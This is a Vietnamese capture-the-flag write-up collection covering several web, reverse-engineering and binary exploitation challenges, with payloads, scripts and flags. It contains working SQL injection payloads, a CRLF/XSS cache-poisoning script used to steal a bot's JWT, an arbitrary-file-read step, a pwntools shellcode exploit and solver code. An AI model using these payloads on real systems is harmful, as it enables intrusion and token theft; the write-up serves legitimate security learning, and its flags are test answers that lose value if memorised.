  Lỗ hổng xuất phát từ hàm GetBan trong backenddatabase/queries.go
  
  Ta có thể inject để set role cho tất cả note thành null như sau:
  'tom@ca.htb'; UPDATE `notes` SET author_id=NULL,private=0 -- -



Khai thác
Với các lỗ hổng trên mình phải tạo IdP của riêng mình để payload SQLi khi email được trả về từ user-info endpoint
IdP cần tạo
    r.GET("/oidc/userinfo", func(c *gin.Context) {
        c.JSON(200, gin.H{
            "email": "'tom@ca.htb'; UPDATE `notes` SET author_id=NULL,private=0 -- -",
        })
    })

Sau khi inject SSO sẽ tìm và load payload SQLi trong tham số email, công khai tất cả các note

OmniWatch
credit: Chương
Phân tích
Web app
Được viết bằng Flask

Routes (/challenge/controller/application/blueprints/routes.py)

/home: hiện thị ra các devices trong db
  @web.route("/home", methods=["GET"])
  @moderator_middleware
  def home():
      mysql_interface = MysqlInterface(current_app.config)
      devices = mysql_interface.fetch_all_devices()
      return render_template("home.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Home", devices=devices)


/device/:
  @web.route("/device/", methods=["GET"])
  @moderator_middleware
  def device(id):
      mysql_interface = MysqlInterface(current_app.config)
      device = mysql_interface.fetch_device(id)

      if not device:
          return redirect("/controller/home")

      return render_template("device.html", user_data=request.user_data, nav_enabled=True, title=f"OmniWatch - Device {device['device_id']}", device=device)

  Lấy ra device theo id truyền vào, middleware moderator_middleware Tuy nhiên, tại đây xuất hiện lỗ hổng SQL Injection, theo file challenge/controller/application/util/database.py:
  def fetch_device(self, device_id):
      query = f"SELECT * FROM devices WHERE device_id = '{device_id}'"
      device = self.query(query, multi=True)[0][0]
      return device

  device_id được truyền vào trực tiếp, có option là multi=True cho phép thực hiện nhiều câu truy vấn => Stack queries

/firmware:
  @web.route("/firmware", methods=["GET", "POST"])
  @moderator_middleware
  def firmware():
      if request.method == "GET":
          patches_avaliable = ["CyberSpecter_v1.5_config.json", "StealthPatch_v2.0_config.json"]
          return render_template("firmware.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Firmware", patches=patches_avaliable)

      if request.method == "POST":
          patch = request.form.get("patch")

          if not patch:
              return response("Missing parameters"), 400

          file_data = open(os.path.join(os.getcwd(), "application", "firmware", patch)).read()
          return file_data, 200

  route này nhận param patch, thực hiện đọc file với: os.path.join(os.getcwd(), "application", "firmware", patch), khi truyền vào là path tuyệt đối thì các thành phần như application hay firmware bị loại bỏ => lỗ hổng Arbitrary File Read

/admin: chứa flag => mục tiêu
  @web.route("/admin", methods=["GET"])
  @administrator_middleware
  def admin():
      flag = os.popen("/readflag").read()
      return render_template("admin.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Admin", flag=flag)


/bot_running: check trạng thái bot đang chạy hay không.
  Trong file challenge/controller/run.py dùng để chạy Flask app, có lên chức năng lên lịch để chạy con bot với 0,5 phút 1 lần:
  schedule.every(0.5).minutes.do(run_scheduled_bot, app.config)

  Đi vào file: challenge/controller/application/util/bot.py:
  ```python
  ...
  def run_scheduled_bot(config):
      try:
          bot_runner(config)
      except Exception:
          mysql_interface = MysqlInterface(config)
          mysql_interface.update_bot_status("not_running")




        def bot_runner(config):
            mysql_interface = MysqlInterface(config)
            mysql_interface.update_bot_status("running")
            chrome_options = Options()
            ...
            client = webdriver.Chrome(options=chrome_options)
            client.get("http://127.0.0.1:1337/controller/login")
            time.sleep(3)
            client.find_element(By.ID, "username").send_keys(config["MODERATOR_USER"])
            client.find_element(By.ID, "password").send_keys(config["MODERATOR_PASSWORD"])
            client.execute_script("document.getElementById('login-btn').click()")
            time.sleep(3)
            client.get(f"http://127.0.0.1:1337/oracle/json/{str(random.randint(1, 15))}")
            time.sleep(10)
            mysql_interface.update_bot_status("not_running")
            client.quit()

        Như vậy con bot sẽ truy cập `/controller/login` rồi sleep 3s, tiếp tục login bằng `username` và `password` và tiếp tục sleep 3s, cuối cùng là truy cập vào `/oracle/json/{str(random.randint(1, 15))}` và sleep 10s

    * `/login`: dùng để login.

* Các middleware:

    * `moderator_middleware`: kiểm tra moderator

    * `administrator_middleware`: kiểm tra admin


Cả 2 đều sử dụng JWT để authen, JWT được verify bởi `secret` key lấy từ `JWT_KEY = open("/app/jwt_secret.txt", "r").read()`:

```python
def verify_jwt(token, secret):
    try:
        payload = jwt.decode(token, secret, algorithms=["HS256"])
        return payload
    except Exception:
        return False
Sau đó tiếp tục check bằng signature có trong db:
signature = jwt_cookie.split(".")[-1] saved_signature = mysql_interface.fetch_signature(user_id)

Query tới db:
def fetch_signature(self, user_id):
    signature = self.query("SELECT signature FROM signatures WHERE user_id = %s", (user_id,), one=True)
    return signature["signature"] if signature else False

Như vậy ta có thể hình dung chain các bugs: XSS lấy JWT có quyền moderator từ bot => Lỗ hổng đọc file để lấy secret key để sign JWT lên administrator => SQLi Stack queries để update signature của JWT => Lấy flag.
Zig
Zig tạo service sử dụng port 4000, cung cấp route /oracle/:mode/:deviceId, theo file challenge/oracle/src/main.zig:
...

fn oracle(req: *httpz.Request, res: *httpz.Response) !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    const allocator = gpa.allocator();

    const deviceId = req.param("deviceId").?;
    const mode = req.param("mode").?;
    const decodedDeviceId = try std.Uri.unescapeString(allocator, deviceId);
    const decodedMode = try std.Uri.unescapeString(allocator, mode);

    const latitude = try randomCoordinates();
    const longtitude = try randomCoordinates();

    res.header("X-Content-Type-Options", "nosniff");
    res.header("X-XSS-Protection", "1; mode=block");
    res.header("DeviceId", decodedDeviceId);

    if (std.mem.eql(u8, decodedMode, "json")) {
        try res.json(.{ .lat = latitude, .lon = longtitude }, .{});
    } else {
        const htmlTemplate =
            \\
            \\
            \\    
            \\        Device Oracle API v2<span class="hljs-number">.6</span>
            \\    
            \\
            \\    Mode: {s}</p>Lat: {s}p><p>Lon: {s}p>
            \\
            \\
        ;

        res.body = try std.fmt.allocPrint(res.arena, htmlTemplate, .{ decodedMode, latitude, longtitude });
    }
}

Ở đây mode là json thì response trả về là JSON, còn không thì là htmlTemplate. deviceId được reflect lại tại header DeviceId trong response. Cũng chính vì vậy nên có lỗ hổng ở đây theo như https://github.com/karlseguin/http.zig/issues/25

POC:
CRLF vào deviceId rồi chèn thêm header Content-Type: text/html để render HTML
Payload: /oracle/%3Cscript%3Ealert(0)%3C%2Fscript%3E/1%0D%0AContent-Type%3A%20text%2Fhtml

Varnish Cache
/config/cache.vcl:

Có 2 config cho port 3000 là của flask app và 4000 là của zig oracle:

backend default1 {
    .host = "127.0.0.1";
    .port = "3000";
}

backend default2 {
    .host = "127.0.0.1";
    .port = "4000";
}

Được sử dụng dựa theo path:
sub vcl_recv {
    if (req.url ~ "^/controller/home"){
        set req.backend_hint = default1;
        if (req.http.Cookie) {
            return (hash);
        }
    } else if (req.url ~ "^/controller") {
        set req.backend_hint = default1;        
    } else if (req.url ~ "^/oracle") {
        set req.backend_hint = default2;
    } else {
        set req.http.Location = "/controller";
        return (synth(301, "Moved"));
    }
}


vcl_backend_response dùng để đưa response đến client, với header CacheKey được sử dụng có giá trị là enable thì response sẽ được lưu vào cache trong 10s:

sub vcl_backend_response {
    if (beresp.http.CacheKey == "enable") {
        set beresp.ttl = 10s;
        set beresp.http.Cache-Control = "public, max-age=10";
    } else {
        set beresp.ttl = 0s;
        set beresp.http.Cache-Control = "public, max-age=0";
    }
}


vcl_hash sử dụng header CacheKey để tạo ra hash => xác định request cần lấy ra trong cache:
  sub vcl_hash {
      hash_data(req.http.CacheKey);
      return (lookup);
  }



Vì vậy, như đã đề cập CRLF ở trên ta có thể inject thêm header CacheKey để thực hiện poisoning tấn công XSS.
Request poisoning với payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E/1%0D%0ACacheKey%3A%20enable%0D%0AContent-Type%3A%20text%2Fhtml

Header X-Cache có giá trị là MISS tức là response đã được ghi vào cache.
Kết quả khi truy cập đến path mà bot sẽ đến:

Khi xem request đó:

Giá trị header X-Cache trong reponse là HIT nghĩa là response này được lấy từ cache
Khai thác
Quay trở lại bài toán, con bot sleep khoảng 3s sau đó login, 3 giây tiếp theo nó sẽ truy cập vào oracle/json/id, vì vậy ta cần thực hiện request poisoning trong khoảng 3s đó.
Ta dùng đoạn script sau:
import requests, urllib, time
URL = "http://localhost:1337"

def poisoning():
    xss_payload = urllib.parse.quote("", safe="")
    crlf_payload = urllib.parse.quote("1\r\nCacheKey: enable\r\nContent-Type: text/html", safe="")
    requests.get(url=URL+"/oracle/" + xss_payload + "/" +crlf_payload)

while True:
    res = requests.get(url=URL + "/controller/bot_running")
    if res.text == "running":
        print("bot running")
        time.sleep(3)
        poisoning()

Chờ đến khi có JWT gửi về :)

Sau đó dùng jwt để thực hiện đọc /app/jwt_secret.txt để lấy key:

Dùng key để lên administrator (jwt.io):

Update signature ppcH8QpznorE7a9QfQxppPKXsEZ9auNrqPttEmVI-pc mới thông qua lỗ hổng SQL Injection tại /controller/device/id.
Encode sang hex để tránh gặp lỗi, payload: 1';UPDATE signatures SET signature = 0x707063483851707a6e6f7245376139516651787070504b5873455a3961754e7271507474456d56492d7063 WHERE user_id = 1--

Truy cập vào /controller/admin để lấy flag:


Reverse Engineering
Flag Casino
credit: 13r_ə_Rɪst

Lại là random@@. Chương trình thực hiện nhận input từng kí tự một và dùng nó làm seed rồi thực hiện so sánh rand() với check[] là mảng có sẵn.
  

Ý tưởng để xử lý bài này là vét cạn các giá trị input bởi đầu vào nhận kiểu dữ liệu byte nên việc vét trong khoảng 0-0xff hoàn toàn không khó khăn gì.

Nếu có gì cần phải lưu ý thì, chall này là một file ELF, nên ta sẽ phải chạy script trong linux để output của rand() tương đồng với chương trình.
  

Dưới đây là script vét input.


#include 
#include 
// using ll = long long;
// using namespace std;
long long check[] = {0x244B28BE, 0x0AF77805, 0x110DFC17, 0x7AFC3A1, 0x6AFEC533, 0x4ED659A2, 0x33C5D4B0,
                   0x286582B8, 0x43383720, 0x55A14FC, 0x19195F9F, 0x43383720, 0x63149380, 0x615AB299,
                   0x6AFEC533, 0x6C6FCFB8, 0x43383720, 0x0F3DA237, 0x6AFEC533, 0x615AB299, 0x286582B8,
                   0x55A14FC, 0x3AE44994, 0x6D7DFE9, 0x4ED659A2, 0x0CCD4ACD, 0x57D8ED64, 0x615AB299, 0x22E9BC2A};

int main()
{
    for (int j = 0; j <= 28; ++j)
        for (int i = 0; i < 0xff; ++i)
        {
            srand(i);
            if (rand() == check[j])
            {
                printf("%c", i);
                break;
            }
        }
}


flag: HTB{r4nd_1s_v3ry_pr3d1ct4bl3}

Don't Panic
credit: 13r_ə_Rɪst

Chall: casino.

Một chall rust tag easy, không có gì khó khăn bởi thậm chí hàm checkflag còn được chỉ ra khá rõ ràng.
  

Thực hiện debug động và nhặt ra từng phần tử của flag một sau các hàm gen.
  


flag: HTB{d0nt_p4n1c_c4tch_the_3rror}

Snaped Shut
credit: 13r_ə_Rɪst

Chall: index.js, package.json, snapshot.blob.

Chall này hơi khó hiểu. 2 file js và json tưởng rằng là thứ cần xem xét kĩ hơn thì lại không có thông tin gì. Flag lại nằm trong file còn lại, thậm chí đọc strings để lấy flag.
  


ans = [72, 84, 66, 123, 98, 52, 99, 107, 100, 48, 48, 114, 95, 49, 110, 95,
       121, 48, 117, 114, 95, 115, 110, 52, 112, 115, 104, 48, 55, 33, 33, 125]
for i in ans:
    print(chr(i), end="")

flag: HTB{b4ckd00r_1n_y0ur_sn4psh07!!}

Tunnel Madness
credit: 13r_ə_Rɪst

Chall: tunnel

Lần thứ 2 mình gặp dạng bài tìm đường đi trong ma trận sau bài maize của giải wolvctf. Tuy nhiên bài này dễ hơn nhiều khi map là ma trận 3 chiều được biểu thị khá rõ ràng.

Sơ bộ về chương trình, ta cần nhập các truy vấn tương ứng với các hướng di chuyển là L/R/F/B/U/D/Q. Chương trình thực hiện tính toán và di chuyển trên map và check vị trí cần đến, nếu đúng thì trả ra flag. Chall này cần connect sever và nhập truy vấn nhằm lấy flag, nên không có gì để xem xét trong hàm get_flag().




Đi vào phân tích hàm move(). Từ những kí tự viết tắt, ta dễ dàng suy luận được ra đây là một map 3 chiều khi có thêm các hướng đi trong không gian(Front/Back).

Dưới đây là toàn bộ hàm move().


int __fastcall move(_DWORD *Curr_pos)
{
  int result; // eax
  int y; // eax
  int y_; // eax
  int v4; // eax
  int v5; // eax
  __int64 x; // [rsp+0h] [rbp-18h] BYREF
  int z; // [rsp+8h] [rbp-10h]
  char v8[9]; // [rsp+Fh] [rbp-9h] BYREF

  printf("Direction (L/R/F/B/U/D/Q)? ");
  if ( (unsigned int)__isoc99_scanf(" %c", v8) != 1 )
    exit(-1);
  v8[0] = (*__ctype_toupper_loc())[v8[0]];
  x = *(_QWORD *)Curr_pos;
  z = Curr_pos[2];
  result = (unsigned __int8)(v8[0] - 66);
  switch ( v8[0] )
  {
    case 'B':
      y = Curr_pos[1];
      if ( !y )
        goto LABEL_32;
      HIDWORD(x) = y - 1;
      if ( *((_DWORD *)checkPos((unsigned int *)&x) + 3) == 2 )
        goto LABEL_33;
      *(_QWORD *)Curr_pos = x;
      result = z;
      Curr_pos[2] = z;
      break;
    case 'D':
      v4 = Curr_pos[2];
      if ( !v4 )
        goto LABEL_32;
      z = v4 - 1;
      if ( *((_DWORD *)checkPos((unsigned int *)&x) + 3) == 2 )
        goto LABEL_33;
      *(_QWORD *)Curr_pos = x;
      result = z;
      Curr_pos[2] = z;
      break;
    case 'F':
      y_ = Curr_pos[1];
      if ( y_ == 19 )
        goto LABEL_32;
      HIDWORD(x) = y_ + 1;
      if ( *((_DWORD *)checkPos((unsigned int *)&x) + 3) == 2 )
        goto LABEL_33;
      *(_QWORD *)Curr_pos = x;
      result = z;
      Curr_pos[2] = z;
      break;
    case 'L':
      if ( !*Curr_pos )
        goto LABEL_32;
      LODWORD(x) = *Curr_pos - 1;
      if ( *((_DWORD *)checkPos((unsigned int *)&x) + 3) == 2 )
        goto LABEL_33;
      *(_QWORD *)Curr_pos = x;
      result = z;
      Curr_pos[2] = z;
      break;
    case 'Q':
      puts("Goodbye!");
      exit(-2);
    case 'R':
      if ( *Curr_pos == 19 )
        goto LABEL_32;
      LODWORD(x) = *Curr_pos + 1;
      if ( *((_DWORD *)checkPos((unsigned int *)&x) + 3) == 2 )
        goto LABEL_33;
      *(_QWORD *)Curr_pos = x;
      result = z;
      Curr_pos[2] = z;
      break;
    case 'U':
      v5 = Curr_pos[2];
      if ( v5 == 19 )
      {
LABEL_32:
        result = puts("Cannot move that way");
      }
      else
      {
        z = v5 + 1;
        if ( *((_DWORD *)checkPos((unsigned int *)&x) + 3) == 2 )
        {
LABEL_33:
          result = puts("Cannot move that way");
        }
        else
        {
          *(_QWORD *)Curr_pos = x;
          result = z;
          Curr_pos[2] = z;
        }
      }
      break;
    default:
      return result;
  }
  return result;
}


Xem xét một chút, ta có thể thấy giá trị trong map tương ứng với tường/chướngngạivật là 2 khi giá trị tại vị trí di chuyển tới tương đương thì sẽ phải nhảy tới thông báo "Cannot move that way". Điều tương tự với số 19.



Quay ra xem hàm checkPos(). Hàm này thực hiện tính vị trí hiện tại với tọa độ hiện tại pos[3] ~ (x,y,z)
  

Tiếp tới map, ta thấy được rằng vị trí cần đến có giá trị là 3. Tuy nhiên, khi đọc sơ qua giá trị của maze, ta lại thấy có khá nhiều tọa độ có giá trị 3.
  

Nhưng khi duyệt cả mảng maze để lọc ra vị trí được tính theo công thức + 12 == 3 thì chỉ có 1. Là vị trí cuối cùng trong ma trận này, cũng được tính với công thức maze[6400*19 + 320*19 + 16*19 + 12 = 127996].
  

script python ida để đọc maze từ ida.


# print(e-s)

import idaapi
import idc
import ida_bytes

def read_memory(address, length):
    data = ida_bytes.get_bytes(address, length)
    if data is None:
        print(f"Failed to read data from address 0x{address:08X}")
    return data

s = 0x00000000000020E0
e = 0x00000000000214DF

print(read_memory(s, e-s+1))


Tới đây mình đi tìm hiểu hàm trong chương trình 1 lúc để quan sát giá trị được tăng thêm khi di chuyển và có kết luận tương ứng rằng:

pos[0] = 'R','L' = +6400,-6400
pos[1] = 'F','B' = +320,-320
pos[2] = 'U','D' = +16,-16


Vị trí được tính theo tổng các bộ giá trị {6400, 320, 16} nhân với tọa độ tương ứng. Vậy mỗi khi di chuyển ta có thể tính ra vị trí của chúng bằng cách cộng thêm giá trị tương ứng với truy vấn đã nhập vào tổng giá trị cho đến khi bằng 127996-12.

Tóm lại, chương trình thực hiện di chuyển từ vị trí maze[0] đến maze[127996-12] với chướng ngại có giá trị là 2 và 19. Các cách di chuyển là [Right,Left,Front,Back,Up,Down] tương ứng với các giá trị [6400,320,16,-6400,-320,-16].

Thực hiện duyệt và lưu lại đường đi chuẩn bằng dfs như dưới đây.


maze=[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 0...]
_Fail=['>>>>????']

_move = [6400,320,16,-6400,-320,-16]

def dfs(_start,_end,_path=[]):
    if _start + 12 == _end:
        print("good")
        return _path

    for i in _move:
        if maze[_start+i+12] != 2 and maze[_start+i+12]!=19:
            if _path[len(_path)-1] + i != 0:
                _path = _path + [i]
                _new = dfs(_start+i,_end,_path)
                if _new:
                    return _new

    return _Fail

_path=[16] # push trước vào mảng trace đường đi kí tự đầu cho đỡ phải viết thêm :v

print(dfs(16,127996, _path))


Viết thêm chương trình convert output script trên rồi quăng vào sever thôi^^.

ans = [16, 16, 16, 6400, 320, 16, 6400, 16, 6400, 6400, 320, 6400, 6400, 320, 320, 16, 16, 320, 16, 6400, 6400, 16, 320, 16, 320, 320, 6400, 320, 16,
       320, 16, 16, 16, 16, 320, 320, 6400, 6400, 16, 16, 16, 320, 16, 6400, 320, -16, 320, 320, 16, 320, 320, 6400, 6400, 6400, 6400, 6400, 320, 6400, 6400]

num = [6400, 320, 16, -6400, -320, -16]
move = ['R', 'F', 'U', 'L', 'B', 'D']
for i in ans:
    for j in range(len(num)):
        if i == num[j]:
            print("'"+move[j]+"'", end=", ")


Duyệt xong mới thấy là bài này chỉ có 1 đường đi duy nhất, vậy thì ai vũ phuvét cạn chút cũng solve được bởi max nước đi chỉ rơi vào khoảng 19*3*6 như đã đề cập trên :v
  


flag: HTB{tunn3l1ng_ab0ut_in_3d_01b23521afc8c7b30d9f8e66002d8ad1}

SatelliteHijack
credit: noobmannn
Challange cho chúng ta một file ELF64 satellite và một file thư viện của linux library.so

Khi run file, chương trình sẽ hiện lên cái Thumbnail như dưới và cứ liên tục bắt người dùng nhập gì đó
         ,-.
        / \  `.  __..-,O ≈ ≈ ≈ ≈ ≈ ≈ ≈ ≈ ≈ ≈ ≈ ≈
       :   \ --''_..-'.'
       |    . .-' `. '.
       :     .     .`.'
        \     `.  /  ..
        \      `.   ' .
          `,       `.   \
         ,|,`.        `-.\
        '.||  ``-...__..-`
         |  |
         |__|
         /||\
        //||\\
       // || \\
    __//__||__\\__
   '--------------' 
| READY TO TRANSMIT |
> kiin
Sending `kiin`
> ull
Sending `ull`
>

Mở file bằng IDA64, chương trình về cơ bản là in ra Thumbnail, sau đó dùng một vòng lặp while(1) để bắt chúng ta nhập input liên tục rồi đưa input đó vào hàm send_satellite_message để xử lý

Khi debug, mình thấy hàm này là một hàm được lấy từ thư viện library.so mà challange cung cấp

Mở library.so bằng IDA64 và xem qua các hàm của nó, dễ dàng nhận thấy send_satellite_message chính là hàm dưới đây

Đọc qua hàm và dựa vào giá trị mà hàm truyền vào ở hàm main của chương trình, dễ nhận thấy chương trình chỉ đơn giản là lặp đi lặp lại việc nối chuỗi chúng ta nhập vào với chuỗi START được khai báo sẵn rồi sau đó cũng chẳng để làm gì cả???

Quay lại library.so và xref theo hàm send_satellite_message, ta thấy hàm này được gọi bới hàm sub_25D0 như dưới đây. Về cơ bản hàm đang muốn lấy giá trị của biến môi trường SAT_PROD_ENVIRONMENT, nếu giá trị này có tồn tại thì chương trình sẽ chạy vào hàm sub_23E3, còn không thì bỏ qua và chạy tiếp vào send_satellite_message

Phân tích hàm sub_23E3

Đầu tiên chương trình gọi hàm getauxval với tham số truyền vào là 0x3 (tương đương với Enum AT_PHDR). Hàm này nhằm được sử dụng để truy xuất các giá trị từ vector phụ trợ (auxiliary vector), đây là một phần của môi trường tiến trình cung cấp các thông tin khác nhau về tiến trình cho kernel và hệ thống. Với tham số là AT_PHDR, hàm này trả về địa chỉ của program headers trong tiến trình. Đây là một mảng các cấu trúc Elf32_Phdr hoặc Elf64_Phdr, tùy thuộc vào kiến trúc của hệ thống (32-bit hoặc 64-bit). Ở trường hợp của bài là mảng các cấu trúc Elf64_Phdr.
Tiếp theo chương trình gọi đến hàm sub_21A9

Đầu tiên hàm thực hiện một vòng lặp phức tạp như dưới đây
  phdrs = (Elf64_Phdr *)((char *)hdr + hdr->p_filesz);
  symtab = 0LL;
  jmprel = 0LL;
  strtab = 0LL;
  for ( i = 0; i < LOWORD(hdr[1].p_type); ++i )
  {
    if ( phdrs[i].p_type == PT_DYNAMIC )
    {
      for ( j = (Elf64_Dyn *)((char *)hdr + phdrs[i].p_offset); j->d_tag; ++j )
      {
        switch ( j->d_tag )
        {
          case DT_SYMTAB:
            symtab = (Elf64_Sym *)((char *)hdr + j->d_un);
            break;
          case DT_STRTAB:
            strtab = (char *)hdr + j->d_un;
            break;
          case DT_JMPREL:
            jmprel = (Elf64_Rela *)((char *)hdr + j->d_un);
            break;
        }
      }
    }
  }
  if ( !symtab || !strtab || !jmprel )
    return 0LL;

Vòng lặp này nhằm làm những việc sau:

Đầu tiên duyệt qua toàn bộ các mảng cấu trúc Elf64_Phdr để tìm mảng có type là PT_DYNAMIC, đây là một loại entry trong bảng Program Header Table, được sử dụng để mô tả một segment động. Segment này chứa các thông tin cần thiết cho quá trình liên kết động (dynamic linking), như các thư viện động cần thiết, các bảng con trỏ, các bảng băm (hash tables), và các thông tin khác.

Sau khi tìm thấy mảng cấu trúc cần thiết, chương trình tiếp tục thực hiện duyệt toàn bộ mảng trên để tìm cấu trúc Elf_Dyn có giá trị d_tag là DT_SYMTAB sau đó lưu địa chỉ của nó vào symtab. Đây chính là con trỏ trỏ đến toàn bộ các symbol, tức là toàn bộ các tên hàm trong file Elf. Tương tự với hai case còn lại là DT_STRTAB - chứa địa chỉ của bảng chuỗi, được lưu vào strtab và DT_JMPREL - chứa địa chỉ của bảng các PLT - Procedure Linkage Table, bảng này chứa các con trỏ trỏ đến địa chỉ các hàm, được lưu vào jmprel


  v4 = -1;
  for ( k = 0; &symtab[k] < (Elf64_Sym *)strtab; ++k )
  {
    v11 = &symtab[k];
    if ( v11->st_name && !strcmp(&strtab[v11->st_name], name) )
    {
      v4 = k;
      break;
    }
  }
  if ( v4 < 0 )
    return 0LL;
  while ( jmprel->r_offset )
  {
    if ( HIDWORD(jmprel->r_info) == v4 )
      return (__int64)hdr + jmprel->r_offset;
    ++jmprel;
  }
  return 0LL;
}

Phần còn lại của hàm thực hiện hai vòng lặp:

Duyệt toàn bộ mảng symtab, đối với mỗi giá trị, chúng ta xác định tên của nó dựa theo bảng strtab rồi so sánh với giá trị name được truyền vào, trong trường hợp cụ thể của chúng ta là tên hàm read. Nếu tìm thấy thì trả về k và lưu nó vào v4

Tiếp theo hàm duyệt tiếp qua bảng jmprel, nếu tìm thấy giá trị nào có r_info trùng với v4, chương trình sẽ trả về địa chỉ của hàm cần tìm.


Tổng kết lại, mục đích của hàm sub_21A9 nhằm tìm địa chỉ của hàm có tên được chỉ định. Ở đây là hàm read
Quay lại hàm sub_23E3, sau khi tìm được địa chỉ hàm read, về cơ bản chương trình sao chép toàn bộ byte của byte_11A9 vào biến dest rồi gọi hàm memfrob, hàm này đơn giản chỉ là xor từng byte của byte_11A9 với 0x2A. Kết quả thu được là một đoạn Shellcode. Sau đó ghi đè toàn bộ đoạn Shellcode trên vào hàm read như ở dưới.
  dest = mmap(0LL, (((char *)sub_21A9 - (char *)byte_11A9) & 0xFFFFFFFFFFFFF000LL) + 4096, 7, 34, -1, 0LL);
  memcpy(dest, byte_11A9, (char *)sub_21A9 - (char *)byte_11A9);
  memfrob(dest, (char *)sub_21A9 - (char *)byte_11A9);
  result = readFuncAddr;
  *readFuncAddr = dest;

Bây giờ ta quay lại file satelitte. Để ý kĩ lại chương trình, trước khi chạy vào vòng lặp kia, chương trình có gọi đến hàm _send_satellite_message trước, bây giờ khi debug lại và chạy vào nó trước, mình đã vào được hàm xử lý có vẻ giống với hàm sub_25D0

Ở đây vì chúng ta chưa định nghĩa giá trị cho biến môi trường SAT_PROD_ENVIRONMENT vậy nên chương trình không chạy vào hàm sub_23E3 được ==> mình sẽ SetIP để cho chương trình chắc chắn chạy qua hàm sub_23E3, sau đó quay lại main, đặt breakpoint tại lệnh gọi hàm _read để trace tới và chạy thẳng vào hàm đó, lúc này chương trình đã nhảy vào các Shellcode được tính trước đó ở sub_23E3

Phân tích Shellcode
Ấn P để chuyển Shellcode sang dạng hàm, có thể nhìn được cơ bản chương trình sẽ chạy như dưới đây

Hàm syscallLinux đơn giản là nhảy tới một hàm gọi syscall như dưới đây, có thể dễ dàng hiểu được hàm này đang yêu cầu chúng ta nhập Input
__int64 __fastcall sub_7FCABB69F121(unsigned int a1)
{
  __int64 result; // rax

  result = a1;
  __asm { syscall; LINUX - }
  return result;
}

Vậy có thể hiểu căn bản như sau: Shellcode yêu cầu chúng ta nhập flag, sau đó tiến hành kiểm tra 4 kí tự đầu của flag có phải là HTB{ hay không, những kí tự còn lại sẽ tiếp tục được đưa vào hàm checkFlag để kiểm tra tiếp

Trên đây là nội dung của hàm checkFlag, dựa vào đó dễ dàng viết được script để lấy flag của challenge
stri = 'l5{0v0Y7fVf?u>|:O!|Lx!o$j,;f'
flag = 'HTB{'
for i in range(28):
    flag += chr(ord(stri[i]) ^ i)
print(flag)

Flag
HTB{l4y3r5_0n_l4y3r5_0n_l4y3r5!}

Pwnable
Regularity
credit: Phan Đình Lực
Check file + checksec + IDA


IDA

_start



    

read

    

BUG:

Lỗi buffer overflow: read() edx=0x110 trong khi chỉ set phần buffer nhập vào 0x100 byte

NX disable: cho phép thực thi shellcode -> ret2shellcode

Dừng ở ret ở hàm read():
  
  




Khai thác
Tận dụng lỗi bof để overwrite saved rip của read thành call/jump rsi.
Công cụ rop gadget:

Script
#!/usr/bin/env python3

    from pwn import *


    def s(p,data):
        p.send(data)
    def sl(p,data):
        p.sendline(data)
    def sla(p,msg,data):
        p.sendlineafter(msg,data)
    def sa(p,msg,data):
        p.sendafter(msg,data)
    def rl(p):
        l=p.recvline()
        return l
    def ru(p,msg):
        l=p.recvuntil(msg)
        return l
    def r(p,size):
        l=p.recv(size)
        return l

    def intFromByte(p,size):
        o = p.recv(size)[::-1].hex()
        output = '0x' + o
        leak = int(output,16)
        return leak

    def GDB(p):
        gdb.attach(p,gdbscript='''
            b*0x000000000040101e
            c
        ''')
        input()

    def main():
        context.binary = exe = ELF("./regularity", checksec=False)
        # libc = ELF("./",checksec=False)
        # ld = ELF("./",checksec=False)
        p = process(exe.path)
        # p=remote('94.237.63.135',35980)
        GDB(p)
        shellcode = asm(shellcraft.sh())
        shellcode =shellcode.ljust(256,b'\x00') +p64(0x0000000000401041)
        sla(p,b'these days?\n',shellcode)
        p.interactive()
    if __name__ == "__main__":
        main()
        # HTB{juMp1nG_w1tH_tH3_r3gIsT3rS?_e89a82a9a29cce817529e60b130d6587}

no_gadget
credit: Phan Đình Lực
Check file + checksec + IDA



IDA

main
  



BUG:

Lỗi buffer overflow: mảng buf[128] nhưng fgets() cho phép nhập 0x1337 byte.

main có check size bằng strlen() nhưng hàm này chỉ đếm byte trước byte NULL nên hoàn toàn có thể bypass chỗ này.




Khai thác

Chương trình không có system, lại cho file libc: có thể là ret2libc và để sử kĩ thuật cần 2 cv

Leak địa chỉ libc base.

Thực thi hàm system trong libc.



Tận dụng lỗi BOF để overwrite saved rip của main() -> Kĩ thuật rop chain

Tuy nhiên, như tên thì challenge không có những gadget thường gặp như pop rdi để leak libc, hay lấy shell.

Nhưng chúng ta có pop rbp:
  
  \=> Từ gadget này chúng ta có thể dùng kĩ thuật pivot + BOF để tiếp tục ghi vào 1 vị trí khác

Đọc mã ASM của main:
  
  -> Để leak libc chúng ta sẽ cần điều khiển được nội dung in ra nhưng ở đây challenge lại kiểm soát bằng rip chứ không phải rbp (mà rip thì no hope cmnr)

Tuy nhiên, chúng ta vẫn còn 1 chút niềm tin bám víu vào hàm fgets và strlen có kiểm soát đối số bằng rbp và điều tuyệt hơn là Relro:Partial (điều này có nghĩa là có thể overwrite GOT)

Vậy quyết định sẽ sử dụng strlen() để leak libc bằng cách overwrite GOT thành call puts

